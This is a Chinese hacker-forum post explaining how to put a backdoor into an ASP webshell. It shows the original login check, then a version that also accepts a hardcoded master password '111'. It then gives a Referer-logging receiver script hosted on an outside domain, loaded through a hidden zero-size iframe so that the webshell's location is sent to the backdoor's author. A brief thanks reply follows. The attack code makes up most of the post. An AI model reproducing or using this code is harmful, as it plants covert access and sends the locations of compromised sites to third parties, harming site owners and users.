设为首页收藏本站
查看: 2453|回复: 2

ASP马里加后门

[复制链接]
  • TA的每日心情
    开心
    昨天 19:05
  • 签到天数: 118 天

    [LV.6]常住居民II

    发表于 2020-4-28 12:31:53 | 显示全部楼层 |阅读模式
    正常的:EnD fUNCtION
    IF SEssIoN("web2a2dmin")<>UsERpaSs thEn
    IF requeSt.FoRM("pass")<>"" TheN
    iF REquesT.foRM("pass")=uSERPASS Then
    SEsSIoN("web2a2dmin")=uSERPAss
    rESPOnsE.rEdirEct Url
    ELse
    rrs"对不起,密码验证失败!"

    加万能密码的:

    EnD fUNCtION
    IF SEssIoN("web2a2dmin")<>UsERpaSs thEn
    IF requeSt.FoRM("pass")<>"" TheN
    iF REquesT.foRM("pass")=uSERPASS or request.form("pass")="111" Then
    SEsSIoN("web2a2dmin")=uSERPAss
    rESPOnsE.rEdirEct Url
    ELse
    rrs"对不起,密码验证失败!"


    下面教大家后门的原理:

    这是一段收信的asp代码将其保存为1.asp

    <%url=Request.ServerVariables("HTTP_Referer")
    set fs=server.CreateObject("Scripting.FileSystemObject")
    set file=fs.OpenTextFile(server.MapPath("bobo.txt"),8,True)
    file.writeline url
    file.close
    set file=nothing
    set fs=nothing
    %>

    代码基本意思就是:“HTTP_REFERER” 链接到当前页面的前一页面的 URL 地址
    简单来说就是获得webshell的地址然后记录在bobo.txt这里文本里

    上传到空间比如 http://a7699888.9k9k.cn/1.asp

    然后里用<iframe src=http://a7699888.9k9k.cn/1.asp width=0 height=0></iframe>插到asp木马中

    那么别人访问这个被挂了马的asp木马就会生成个bobo.txt里面就会有asp大马的路径了

    点评

    https://blog.csdn.net/fsdzsec/article/details/53147625 转载请留出处  发表于 2020-4-29 09:57
  • TA的每日心情

    前天 00:11
  • 签到天数: 93 天

    [LV.6]常住居民II

    发表于 2020-6-28 15:46:24 | 显示全部楼层
    感谢楼主分享
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    关闭

    站长推荐 上一条 /3 下一条

    红盟社区--中国红客联盟 

    Processed in 0.059798 second(s), 15 queries.

    站点统计| 举报| Archiver| 手机版| 黑屋 |   

    Powered by HUC © 2001-2017 Comsenz Inc.

    手机扫我进入移动触屏客户端

    关注我们可获取更多热点资讯

    Honor accompaniments. theme macfee

    快速回复 返回顶部 返回列表